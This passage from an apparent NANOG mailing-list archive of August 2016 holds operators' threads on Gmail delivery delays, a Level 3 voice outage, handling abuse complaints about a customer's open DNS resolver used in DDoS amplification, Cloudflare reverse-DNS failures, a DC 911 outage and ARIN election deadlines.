on mailop. :) And apparently you need to know the secret handshake to get on. After Chrome complained the SSL cert on the subscription page had expired 6 months ago, the site tells me I can't subscribe: Your subscription is not allowed because the email address you gave is insecure. Yay, team? From nate at dopedesign.com Sat Aug 27 19:23:01 2016 From: nate at dopedesign.com (Nate Metheny) Date: Sat, 27 Aug 2016 13:23:01 -0600 Subject: Why the internal network delays, Gmail?
In-Reply-To: <20160827171657.GB9725@lboro.ac.uk> References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> <20160827171657.GB9725@lboro.ac.uk> Message-ID: Thanks for all the feedback related and unrelated to the problem. I'm aware of many available troubleshooting tools and considered this one of them, but I've been shown that this, albeit appropriate, forum, was not a good choice to solicit technical assistance. I consider the matter closed. -- Sent from a phone. Please excuse the brevity of this message and any typographical errors. On Aug 27, 2016 11:17, wrote: > Hi, > > > I was working within the limits of what I had available. > > Google offer several trouble shooting tools for their service too, > you might want to look at their toolbox eg > > https://toolbox.googleapps.com/apps/messageheader/ > > (part of their 'why is my email slow to deliver?' process) > > alan > From mpalmer at hezmatt.org Sun Aug 28 01:46:27 2016 From: mpalmer at hezmatt.org (Matt Palmer) Date: Sun, 28 Aug 2016 11:46:27 +1000 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160827012542.43353.qmail@ary.lan> References: <20160827012542.43353.qmail@ary.lan> Message-ID: <20160828014627.GE4869@hezmatt.org> On Sat, Aug 27, 2016 at 01:25:42AM -0000, John Levine wrote: > In article you write: > >I was working within the limits of what I had available. > > Here's the subscription page for mailop. It's got about as odd > a mix of people as nanog, ranging from people with single user linux > machines to people who run some of the largest mail systems in > the world, including Gmail: > > https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop I know they're mailops, and not tlsops, but surely presenting a cert that didn't expire six months ago isn't beyond the site admin's capabilities? 
- Matt From joe at nethead.com Sun Aug 28 07:53:33 2016 From: joe at nethead.com (Joe Hamelin) Date: Sun, 28 Aug 2016 00:53:33 -0700 Subject: Why the internal network delays, Gmail? In-Reply-To: <77625.1472322263@turing-police.cc.vt.edu> References: <20160827012542.43353.qmail@ary.lan> <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> <77625.1472322263@turing-police.cc.vt.edu> Message-ID: On Sat, Aug 27, 2016 at 11:24 AM, wrote: > > And apparently you need to know the secret handshake to get on. I was able to sign-up yesterday, I even saw John's mail about your insecure error. I don't know why I didn't sign up before, my work ITIL is Messaging Manager. -- Joe Hamelin, W7COM, Tulalip, WA, +1 (360) 474-7474 From erich at gotfusion.net Sun Aug 28 12:51:09 2016 From: erich at gotfusion.net (Kaiser, Erich) Date: Sun, 28 Aug 2016 07:51:09 -0500 Subject: Brocade 6910 password recovery Message-ID: Anyone know how to do a password recovery on the BR6910 Metro E Switches, I know standard procedure for 99% of their gear, but it does not work on these. I have searched high and low online and also submitted ticket, with no answer yet. Thanks in advance. Erich Kaiser The Fusion Network From dhubbard at dino.hostasaurus.com Mon Aug 29 14:31:19 2016 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 29 Aug 2016 14:31:19 +0000 Subject: Level 3 voice outage? Message-ID: <542F38AA-F406-4D50-B211-CBE1E32D0D7A@dino.hostasaurus.com> Curious if anyone else is having issues with Level 3 (legacy Twtelecom specifically) enterprise SIP? I'm at minute 45 of being on hold with them, so I suspect they are having known issues. Our sales rep mentioned a toll free outage being tracked under master ticket 11377637 but I don't have the details of that yet. We're seeing our toll free numbers completely down, since what I believe to be 4a EST time frame.
Most of our toll numbers have an unusual 25 second delay before we get any SIP traffic from their equipment, but the call does ultimately connect. David From sryan at arbor.net Mon Aug 29 14:34:27 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Mon, 29 Aug 2016 14:34:27 +0000 Subject: Level 3 voice outage? In-Reply-To: <542F38AA-F406-4D50-B211-CBE1E32D0D7A@dino.hostasaurus.com> References: <542F38AA-F406-4D50-B211-CBE1E32D0D7A@dino.hostasaurus.com> Message-ID: Ran across this earlier, it sounds bad. https://www.reddit.com/r/networking/comments/504xbo/level_3_voice_outage_global_ticket_being_worked/ Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of David Hubbard Sent: Monday, August 29, 2016 10:31:19 AM To: nanog at nanog.org Subject: Level 3 voice outage? Curious if anyone else is having issues with Level 3 (legacy Twtelecom specifically) enterprise SIP? I'm at minute 45 of being on hold with them, so I suspect they are having known issues. Our sales rep mentioned a toll free outage being tracked under master ticket 11377637 but I don't have the details of that yet. We're seeing our toll free numbers completely down, since what I believe to be 4a EST time frame. Most of our toll numbers have an unusual 25 second delay before we get any SIP traffic from their equipment, but the call does ultimately connect. David From jason.m.lee at gmail.com Mon Aug 29 15:55:27 2016 From: jason.m.lee at gmail.com (Jason Lee) Date: Mon, 29 Aug 2016 10:55:27 -0500 Subject: Handling of Abuse Complaints Message-ID: NANOG Community, I was curious how various players in this industry handle abuse complaints. I'm drafting a policy for the service provider I'm working for about handing of complaints registered against customer IP space.
In this example I have a customer who is running an open resolver and have received a few complaints now regarding it being used as part of a DDoS attack. My initial response was to inform the customer and ask them to fix it. Now that its still ongoing over a month later, I'd like to take action to remediate the issue myself with ACLs but our customer facing team is pushing back and without an idea of what the industry best practice is, management isn't sure which way to go. I'm hoping to get an idea of how others handle these cases so I can develop our formal policy on this and have management sign off and be able to take quicker action in the future. Thanks, Jason From hugo at slabnet.com Mon Aug 29 16:05:13 2016 From: hugo at slabnet.com (Hugo Slabbert) Date: Mon, 29 Aug 2016 09:05:13 -0700 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: <20160829160513.GG16458@bamboo.slabnet.com> On Mon 2016-Aug-29 10:55:27 -0500, Jason Lee wrote: >NANOG Community, > >I was curious how various players in this industry handle abuse complaints. >I'm drafting a policy for the service provider I'm working for about >handing of complaints registered against customer IP space. In this example >I have a customer who is running an open resolver and have received a few >complaints now regarding it being used as part of a DDoS attack. > >My initial response was to inform the customer and ask them to fix it. Now >that its still ongoing over a month later, I'd like to take action to >remediate the issue myself with ACLs but our customer facing team is >pushing back and without an idea of what the industry best practice is, >management isn't sure which way to go. > >I'm hoping to get an idea of how others handle these cases so I can develop >our formal policy on this and have management sign off and be able to take >quicker action in the future. 
If you've informed them of the issue, given them time to resolve, and they've failed to take action, at some point you need to escalate and cauterize the wound to prevent abuse traffic spewing forth from the customer's (and subsequently your) network. How you implement that specifically is your call, but I would at least start giving specific timelines to the customer and outline the steps that will be taken if they fail to remediate by those times in order to give them fair warning. I've been fairly specific previously about crafting filters to drop just the offending traffic, which should be doable here given the vector, but in other cases where it was obvious the offending hosts were simply compromised to hell and spewing myriad garbage traffic, I have cut users off completely to chop C&C access etc. This was during time at a regional commercial ISP on business circuits. -- Hugo Slabbert | email, xmpp/jabber: hugo at slabnet.com pgp key: B178313E | also on Signal > >Thanks, > >Jason From bill at herrin.us Mon Aug 29 16:27:42 2016 From: bill at herrin.us (William Herrin) Date: Mon, 29 Aug 2016 12:27:42 -0400 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: Dear Customer, Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). Please be advised that we will interrupt network access to that server on Date2. This will likely disrupt your service. To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. I stand ready to assist any way that I can.
Regards, Your Name On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this example > I have a customer who is running an open resolver and have received a few > complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. Now > that its still ongoing over a month later, I'd like to take action to > remediate the issue myself with ACLs but our customer facing team is > pushing back and without an idea of what the industry best practice is, > management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can develop > our formal policy on this and have management sign off and be able to take > quicker action in the future. > > Thanks, > > Jason -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From Gareth.Tupper at warnerpacific.com Mon Aug 29 16:31:58 2016 From: Gareth.Tupper at warnerpacific.com (Gareth Tupper) Date: Mon, 29 Aug 2016 16:31:58 +0000 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: "unlawfully" is probably redundant, unless these are otherwise law-abiding cyber criminals. /pedant -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of William Herrin Sent: Monday, August 29, 2016 9:28 AM To: Jason Lee Cc: nanog at nanog.org Subject: Re: Handling of Abuse Complaints Dear Customer, Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). 
Please be advised that we will interrupt network access to that server on Date2. This will likely disrupt your service. To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. I stand ready to assist any way that I can. Regards, Your Name On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this > example I have a customer who is running an open resolver and have > received a few complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. > Now that its still ongoing over a month later, I'd like to take action > to remediate the issue myself with ACLs but our customer facing team > is pushing back and without an idea of what the industry best practice > is, management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can > develop our formal policy on this and have management sign off and be > able to take quicker action in the future. > > Thanks, > > Jason -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: This electronic mail transmission contains information from Warner Pacific Insurance Services that may be confidential or privileged. Such information is solely for the intended recipient, and use by any other party is not authorized. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of this message, its contents or any attachments is prohibited. Any wrongful interception of this message is punishable as a Federal Crime. 
If you have received this message in error, please notify the sender immediately by telephone (800) 801-2300 or by electronic mail at postmaster at warnerpacific.com. From fergdawgster at mykolab.com Mon Aug 29 16:37:28 2016 From: fergdawgster at mykolab.com (Paul Ferguson) Date: Mon, 29 Aug 2016 09:37:28 -0700 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> I would suggest that violation of the ISP's ToS should also be consideration, since what may be illegal in one jurisdiction may not be illegal in some other jurisdictions. Repeated abuse and violations of an ISP's ToS should also be a consideration to terminate a customer relationship, and ISPs are fully within their rights to take this type of action. - ferg > On Aug 29, 2016, at 9:31 AM, Gareth Tupper wrote: > > "unlawfully" is probably redundant, unless these are otherwise law-abiding cyber criminals. > > /pedant > > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of William Herrin > Sent: Monday, August 29, 2016 9:28 AM > To: Jason Lee > Cc: nanog at nanog.org > Subject: Re: Handling of Abuse Complaints > > Dear Customer, > > Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. > > The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). Please be advised that we will interrupt network access to that server on Date2. > This will likely disrupt your service. > > To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. > > I stand ready to assist any way that I can. > > Regards, > Your Name > > > > > > On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: >> NANOG Community, >> >> I was curious how various players in this industry handle abuse complaints.
>> I'm drafting a policy for the service provider I'm working for about >> handing of complaints registered against customer IP space. In this >> example I have a customer who is running an open resolver and have >> received a few complaints now regarding it being used as part of a DDoS attack. >> >> My initial response was to inform the customer and ask them to fix it. >> Now that its still ongoing over a month later, I'd like to take action >> to remediate the issue myself with ACLs but our customer facing team >> is pushing back and without an idea of what the industry best practice >> is, management isn't sure which way to go. >> >> I'm hoping to get an idea of how others handle these cases so I can >> develop our formal policy on this and have management sign off and be >> able to take quicker action in the future. >> >> Thanks, >> >> Jason > > > > -- > William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: > > -- Paul Ferguson ICEBRG.io Seattle, Washington, USA
From steve at blighty.com Mon Aug 29 16:47:04 2016 From: steve at blighty.com (Steve Atkins) Date: Mon, 29 Aug 2016 09:47:04 -0700 Subject: Handling of Abuse Complaints In-Reply-To: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> References: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> Message-ID: > On Aug 29, 2016, at 9:37 AM, Paul Ferguson wrote: > > I would suggest that violation of the ISP's ToS should also be consideration, since what may be illegal in one jurisdiction may not be illegal in some other jurisdictions. Unless your abuse / security desk is staffed by lawyers it's probably better to avoid words like "criminal" and "unlawfully" altogether and stick to "in violation of our ToS". > Repeated abuse and violations of an ISP's ToS should also be a consideration to terminate a customer relationship, and ISPs are fully within their rights to take this type of action. And don't need to lean on "it's probably illegal" to do so, nor imply that if it were legal they wouldn't necessarily enforce their ToS. (All assuming that being abused as part of a dDoS reflector actually is against your ToS. If it's not things get more complex.) Cheers, Steve > > - ferg > > > >> On Aug 29, 2016, at 9:31 AM, Gareth Tupper wrote: >> >> "unlawfully" is probably redundant, unless these are otherwise law-abiding cyber criminals. >> >> /pedant >> >> -----Original Message----- >> From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of William Herrin >> Sent: Monday, August 29, 2016 9:28 AM >> To: Jason Lee >> Cc: nanog at nanog.org >> Subject: Re: Handling of Abuse Complaints >> >> Dear Customer, >> >> Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. >> >> The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached).
Please be advised that we will interrupt network access to that server on Date2. >> This will likely disrupt your service. >> >> To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. >> >> I stand ready to assist any way that I can. >> >> Regards, >> Your Name >> >> >> >> >> >> On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: >>> NANOG Community, >>> >>> I was curious how various players in this industry handle abuse complaints. >>> I'm drafting a policy for the service provider I'm working for about >>> handing of complaints registered against customer IP space. In this >>> example I have a customer who is running an open resolver and have >>> received a few complaints now regarding it being used as part of a DDoS attack. >>> >>> My initial response was to inform the customer and ask them to fix it. >>> Now that its still ongoing over a month later, I'd like to take action >>> to remediate the issue myself with ACLs but our customer facing team >>> is pushing back and without an idea of what the industry best practice >>> is, management isn't sure which way to go. >>> >>> I'm hoping to get an idea of how others handle these cases so I can >>> develop our formal policy on this and have management sign off and be >>> able to take quicker action in the future. >>> >>> Thanks, >>> >>> Jason >> >> >> >> -- >> William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: >> >> >> This electronic mail transmission contains information from Warner Pacific Insurance Services that may be confidential or privileged. Such information is solely for the intended recipient, and use by any other party is not authorized. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of this message, its contents or any attachments is prohibited. Any wrongful interception of this message is punishable as a Federal Crime. 
>> If you have received this message in error, please notify the sender immediately by telephone (800) 801-2300 or by electronic mail at postmaster at warnerpacific.com.
>
> --
> Paul Ferguson
> ICEBRG.io
> Seattle, Washington, USA
>
>
>

From laszlo at heliacal.net Mon Aug 29 17:04:26 2016
From: laszlo at heliacal.net (Laszlo Hanyecz)
Date: Mon, 29 Aug 2016 17:04:26 +0000
Subject: Handling of Abuse Complaints
In-Reply-To:
References:
Message-ID:

I know this is against the popular religion here but how is this abuse on the part of your customer? Google, Level3 and many others also run open resolvers, because they're useful services. This is why we can't have nice things.

On 2016-08-29 15:55, Jason Lee wrote:
> NANOG Community,
>
> I was curious how various players in this industry handle abuse complaints.
> I'm drafting a policy for the service provider I'm working for about
> handling of complaints registered against customer IP space. In this example
> I have a customer who is running an open resolver and have received a few
> complaints now regarding it being used as part of a DDoS attack.
>
> My initial response was to inform the customer and ask them to fix it. Now
> that it's still ongoing over a month later, I'd like to take action to
> remediate the issue myself with ACLs but our customer facing team is
> pushing back and without an idea of what the industry best practice is,
> management isn't sure which way to go.
>
> I'm hoping to get an idea of how others handle these cases so I can develop
> our formal policy on this and have management sign off and be able to take
> quicker action in the future.
>
> Thanks,
>
> Jason

From leefuller23 at gmail.com Mon Aug 29 17:13:33 2016
From: leefuller23 at gmail.com (Lee Fuller)
Date: Mon, 29 Aug 2016 18:13:33 +0100
Subject: Handling of Abuse Complaints
In-Reply-To:
References:
Message-ID:

It's quite possible to operate an open resolver while still making it very difficult to use in an amplification attack - maybe coach your user into using rate limiting if you are particularly keen not to 'shape' their traffic at this stage.

PowerDNS has a very powerful load balancer that can be used effectively although its name escapes me now. PowerDNS 3x and 4x also have an effective anti spoofing mechanism.

*Kind Regards,
Lee Fuller*
*PGP Fingerprint : * 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A

On 29 August 2016 at 18:04, Laszlo Hanyecz wrote:

> I know this is against the popular religion here but how is this abuse on
> the part of your customer? Google, Level3 and many others also run open
> resolvers, because they're useful services. This is why we can't have nice
> things.
>
>
>
> On 2016-08-29 15:55, Jason Lee wrote:
>
>> NANOG Community,
>>
>> I was curious how various players in this industry handle abuse
>> complaints.
>> I'm drafting a policy for the service provider I'm working for about
>> handling of complaints registered against customer IP space. In this
>> example
>> I have a customer who is running an open resolver and have received a few
>> complaints now regarding it being used as part of a DDoS attack.
>>
>> My initial response was to inform the customer and ask them to fix it. Now
>> that it's still ongoing over a month later, I'd like to take action to
>> remediate the issue myself with ACLs but our customer facing team is
>> pushing back and without an idea of what the industry best practice is,
>> management isn't sure which way to go.
>>
>> I'm hoping to get an idea of how others handle these cases so I can
>> develop
>> our formal policy on this and have management sign off and be able to take
>> quicker action in the future.
>>
>> Thanks,
>>
>> Jason
>>
>
>

From fhr at fhrnet.eu Mon Aug 29 17:15:42 2016
From: fhr at fhrnet.eu (Filip Hruska)
Date: Mon, 29 Aug 2016 19:15:42 +0200
Subject: Handling of Abuse Complaints
In-Reply-To:
References:
Message-ID: <72606cc6-c720-eb14-c889-f8692ea2b940@fhrnet.eu>

Google, Level 3 and the like's open DNS resolvers are strictly rate-limited. They can't be used as DDOS amplifiers.

On the other hand, there are tons of open resolvers on the internet without any sort of limiting. These are very effective amplifiers.

Regards,
Filip

On 29.8.2016 19:04, Laszlo Hanyecz wrote:
> I know this is against the popular religion here but how is this abuse
> on the part of your customer? Google, Level3 and many others also run
> open resolvers, because they're useful services. This is why we can't
> have nice things.
>
>
> On 2016-08-29 15:55, Jason Lee wrote:
>> NANOG Community,
>>
>> I was curious how various players in this industry handle abuse
>> complaints.
>> I'm drafting a policy for the service provider I'm working for about
>> handling of complaints registered against customer IP space. In this
>> example
>> I have a customer who is running an open resolver and have received a few
>> complaints now regarding it being used as part of a DDoS attack.
>>
>> My initial response was to inform the customer and ask them to fix it.
>> Now
>> that it's still ongoing over a month later, I'd like to take action to
>> remediate the issue myself with ACLs but our customer facing team is
>> pushing back and without an idea of what the industry best practice is,
>> management isn't sure which way to go.
>>
>> I'm hoping to get an idea of how others handle these cases so I can
>> develop
>> our formal policy on this and have management sign off and be able to
>> take
>> quicker action in the future.
>>
>> Thanks,
>>
>> Jason
>

From jmaimon at ttec.com Mon Aug 29 17:46:25 2016
From: jmaimon at ttec.com (Joe Maimon)
Date: Mon, 29 Aug 2016 13:46:25 -0400
Subject: Handling of Abuse Complaints
In-Reply-To: <72606cc6-c720-eb14-c889-f8692ea2b940@fhrnet.eu>
References: <72606cc6-c720-eb14-c889-f8692ea2b940@fhrnet.eu>
Message-ID: <57C474F1.9030202@ttec.com>

There is a distance to travel between can't and can't effectively.

Perhaps they can share how they ever so effectively have solved this conundrum. After all, they are apparently not getting any abuse reports ever.

As an operator of several open resolvers (with rate limiting and automatic mitigation in effect) to support my customer base until the network landscape supports alternative approaches, I would like to know how they accomplished that little trick.

Filip Hruska wrote:
> Google, Level 3 and the like's open DNS resolvers are strictly
> rate-limited. They can't be used as DDOS amplifiers.
>
> On the other hand, there are tons of open resolvers on the internet
> without any sort of limiting. These are very effective amplifiers.
>
> Regards,
> Filip
>
> On 29.8.2016 19:04, Laszlo Hanyecz wrote:
>> I know this is against the popular religion here but how is this abuse
>> on the part of your customer? Google, Level3 and many others also run
>> open resolvers, because they're useful services. This is why we can't
>> have nice things.
>>
>>
>> On 2016-08-29 15:55, Jason Lee wrote:
>>> NANOG Community,
>>>
>>> I was curious how various players in this industry handle abuse
>>> complaints.
>>> I'm drafting a policy for the service provider I'm working for about
>>> handling of complaints registered against customer IP space.
>>> In this
>>> example
>>> I have a customer who is running an open resolver and have received a
>>> few
>>> complaints now regarding it being used as part of a DDoS attack.
>>>
>>> My initial response was to inform the customer and ask them to fix it.
>>> Now
>>> that it's still ongoing over a month later, I'd like to take action to
>>> remediate the issue myself with ACLs but our customer facing team is
>>> pushing back and without an idea of what the industry best practice is,
>>> management isn't sure which way to go.
>>>
>>> I'm hoping to get an idea of how others handle these cases so I can
>>> develop
>>> our formal policy on this and have management sign off and be able to
>>> take
>>> quicker action in the future.
>>>
>>> Thanks,
>>>
>>> Jason
>>
>
>

From bill at herrin.us Mon Aug 29 18:17:53 2016
From: bill at herrin.us (William Herrin)
Date: Mon, 29 Aug 2016 14:17:53 -0400
Subject: Handling of Abuse Complaints
In-Reply-To:
References: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com>
Message-ID:

On Mon, Aug 29, 2016 at 12:47 PM, Steve Atkins wrote:
> Unless your abuse / security desk is staffed by
> lawyers it's probably better to avoid words like
> "criminal" and "unlawfully" altogether

Not really an ambiguous situation IMHO, but whatever floats your boat.

Bear in mind, though, that if you reasonably suspect your company is caught up in a specific violation of the law and you fail to validate and/or end the violation, your inaction brings liability on the company. Even though you're not a lawyer. That's true from the highest executive to the lowest janitor.

> and stick to "in violation of our ToS".

This I would avoid. A ToS is a contract. Contracts are open to negotiation. The law is not. If you don't want to say "unlawfully attack," then stop at "attack."

On Mon, Aug 29, 2016 at 1:04 PM, Laszlo Hanyecz wrote:
> I know this is against the popular religion here but how is this abuse on
> the part of your customer?
> Google, Level3 and many others also run open
> resolvers, because they're useful services. This is why we can't have nice
> things.

Google mitigates the attack vector with rate limiting through custom software. I would venture a guess that Jason's customer is not that sophisticated.

Regards,
Bill Herrin

--
William Herrin ................ herrin at dirtside.com bill at herrin.us
Owner, Dirtside Systems ......... Web:

From dimith50 at outlook.com Mon Aug 29 14:35:45 2016
From: dimith50 at outlook.com (Hristo Dimitrov)
Date: Mon, 29 Aug 2016 16:35:45 +0200
Subject: Looking for Spamhaus contact
Message-ID:

Hi,

Could somebody from Spamhaus contact me offlist?

I've run in the case "[CIDR] conflicts with other PBL master records" where the whole range previously seems to have belonged to another ISP who has returned the range to RIPE. However they still have it listed in a PBL and it is not possible to contact them.

As per Spamhaus FAQ "...contact Spamhaus directly to obtain control of those Master Ranges. There is a contact address in your PBL Account."

The issue is that I do not see a Spamhaus contact address in our PBL account. And there doesn't seem to be any other conventional way to contact Spamhaus...

Best regards,
Hristo D.

From list at satchell.net Mon Aug 29 19:00:49 2016
From: list at satchell.net (Stephen Satchell)
Date: Mon, 29 Aug 2016 12:00:49 -0700
Subject: Handling of Abuse Complaints
In-Reply-To:
References:
Message-ID: <3dc3fd61-5123-0070-dd4e-435ce6785577@satchell.net>

On 08/29/2016 08:55 AM, Jason Lee wrote:
> NANOG Community,
>
> I was curious how various players in this industry handle abuse complaints.
> I'm drafting a policy for the service provider I'm working for about
> handling of complaints registered against customer IP space. In this example
> I have a customer who is running an open resolver and have received a few
> complaints now regarding it being used as part of a DDoS attack.
>
> My initial response was to inform the customer and ask them to fix it. Now
> that it's still ongoing over a month later, I'd like to take action to
> remediate the issue myself with ACLs but our customer facing team is
> pushing back and without an idea of what the industry best practice is,
> management isn't sure which way to go.
>
> I'm hoping to get an idea of how others handle these cases so I can develop
> our formal policy on this and have management sign off and be able to take
> quicker action in the future.

It depends on the nature of the complaint. If it's an amplification attack of some kind, figure out how the perp is doing it, and block it as appropriate. For example, do you filter incoming packets with source address of subnet network and broadcast (shorter than /30) and allnet (255.255.255.255) broadcast, and filter packets outbound with destinations of allnet broadcast?

DNS and NTP can be tricked into generating packet storms. In particular, you may want to block excessive large DNS requests inbound using deep packet inspection at your edge.

Not all abuse problems are the fault of the customer. You have to do your part as well.

From jbaino at gmail.com Mon Aug 29 20:46:05 2016
From: jbaino at gmail.com (Jeremy)
Date: Mon, 29 Aug 2016 13:46:05 -0700
Subject: Cloudflare reverse DNS SERVFAIL, normal?
Message-ID:

We're seeing a huge uptick in reverse dns lookup failures across an app, 99% are all for Cloudflare ip addresses.

Instead of seeing a PTR or NXDOMAIN we're getting back SERVFAIL.

Does anyone know if this is a standard response from them? Do they not have reverse DNS setup for their networks?

Trying to narrow this down to see if it's a result in a change in how our application handles these errors or if there's an issue going on with cloudflare's DNS setup.

Thanks!
Jeremy

From opendak at shaw.ca Mon Aug 29 21:13:50 2016
From: opendak at shaw.ca (David)
Date: Mon, 29 Aug 2016 15:13:50 -0600
Subject: Cloudflare reverse DNS SERVFAIL, normal?
In-Reply-To:
References:
Message-ID: <628ea202-e802-3cf3-3501-e39804860c33@shaw.ca>

On 2016-08-29 2:46 PM, Jeremy wrote:
> We're seeing a huge uptick in reverse dns lookup failures across an app,
> 99% are all for Cloudflare ip addresses.
>
> Instead of seeing a PTR or NXDOMAIN we're getting back SERVFAIL.
>
> Does anyone know if this is a standard response from them? Do they not have
> reverse DNS setup for their networks?
>

Got an example range? All the ones I'm checking here seem fine.

> Trying to narrow this down to see if it's a result in a change in how our
> application handles these errors or if there's an issue going on with
> cloudflare's DNS setup.
>
> Thanks!
> Jeremy
>

From marka at isc.org Mon Aug 29 21:28:43 2016
From: marka at isc.org (Mark Andrews)
Date: Tue, 30 Aug 2016 07:28:43 +1000
Subject: Cloudflare reverse DNS SERVFAIL, normal?
In-Reply-To: Your message of "Mon, 29 Aug 2016 13:46:05 -0700."
References:
Message-ID: <20160829212843.53C1252BB76F@rock.dv.isc.org>

In message , Jeremy writes:
> We're seeing a huge uptick in reverse dns lookup failures across an app,
> 99% are all for Cloudflare ip addresses.
>
> Instead of seeing a PTR or NXDOMAIN we're getting back SERVFAIL.
>
> Does anyone know if this is a standard response from them? Do they not have
> reverse DNS setup for their networks?
>
> Trying to narrow this down to see if it's a result in a change in how our
> application handles these errors or if there's an issue going on with
> cloudflare's DNS setup.
>
> Thanks!
> Jeremy

If you are delegated a zone then you should answer queries for that zone. SERVFAIL is not appropriate. It indicates a condition that needs to be fixed especially from an authoritative server.

Contact Cloudflare with a list of failing names. Cloudflare are generally good about making sure the DNS is giving well formed answers.

The following is general and is not directed at Cloudflare.
I know some people don't think errors in the reverse DNS are not critical but if you are delegated a zone it is your responsibility to ensure your servers are correctly serving that zone regardless of where it is in the DNS hierarchy. Failure to do that causes additional work for recursive servers. If you don't want to serve a zone then remove the delegation.

Mark
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

From sean at donelan.com Mon Aug 29 21:51:29 2016
From: sean at donelan.com (Sean Donelan)
Date: Mon, 29 Aug 2016 17:51:29 -0400 (EDT)
Subject: Don't press the big red buttom on the wall!
Message-ID:

See that big red button on the wall under the sign "Do Not Push This Button!"....

DC 911 outage caused by contractor error
http://wtop.com/dc/2016/08/dc-911-outage-caused-by-contractor-who-pulled-wrong-switch/

WASHINGTON - D.C. is now operating two separate 911 centers after a power outage caused by human error left the nation’s capital without any emergency phone service for almost an hour on a busy weekend night.

A contractor working Saturday night inadvertently pulled an emergency power shut off switch that cut electricity to the 911 phone system and a call routing system at the District’s Unified Communications Center, said the center’s Director Karima Holmes.

“Unfortunately because it was human error we weren’t prepared for it,” Holmes said.
[...]

From surfer at mauigateway.com Mon Aug 29 22:45:21 2016
From: surfer at mauigateway.com (Scott Weeks)
Date: Mon, 29 Aug 2016 15:45:21 -0700
Subject: Don't press the big red buttom on the wall!
Message-ID: <20160829154521.760D8AB3@m0087794.ppops.net>

--- sean at donelan.com wrote:
From: Sean Donelan

See that big red button on the wall under the sign "Do Not Push This Button!"....
DC 911 outage caused by contractor error
http://wtop.com/dc/2016/08/dc-911-outage-caused-by-contractor-who-pulled-wrong-switch/
----------------------------------------------------

That was caused by more than just contractor error. It is FAIL on many, many levels including design, testing and much more! There're a large number of folks responsible for this failure.

scott

From A.L.M.Buxey at lboro.ac.uk Mon Aug 29 23:02:12 2016
From: A.L.M.Buxey at lboro.ac.uk (Alan Buxey)
Date: Tue, 30 Aug 2016 00:02:12 +0100
Subject: Don't press the big red buttom on the wall!
In-Reply-To:
References:
Message-ID:

>“Unfortunately because it was human
>error we weren’t prepared for it,”
>Holmes said.

"But it's elementary!" Watson retorted

:)

alan

From jcurran at arin.net Mon Aug 29 23:16:15 2016
From: jcurran at arin.net (John Curran)
Date: Mon, 29 Aug 2016 23:16:15 +0000
Subject: ARIN 2016 Election - Nominations and Voter Eligibility
Message-ID: <2DE67584-1B32-4510-B2AC-51253CE34162@arin.net>

Folks -

For those of you associated with ARIN member organizations, please note two important deadlines fast approaching -

31 August is the last day for ARIN Members to nominate candidates to serve on the ARIN Board of Trustees and/or Advisory Council. Note that 31 August is also the last day to nominate candidates to represent the ARIN region on the NRO Number Council (and anyone in the community may make such a nomination.) Submit your nomination(s) at https://www.surveymonkey.com/r/ARIN2016 and find more information about ARIN elections at: https://www.arin.net/participate/elections/

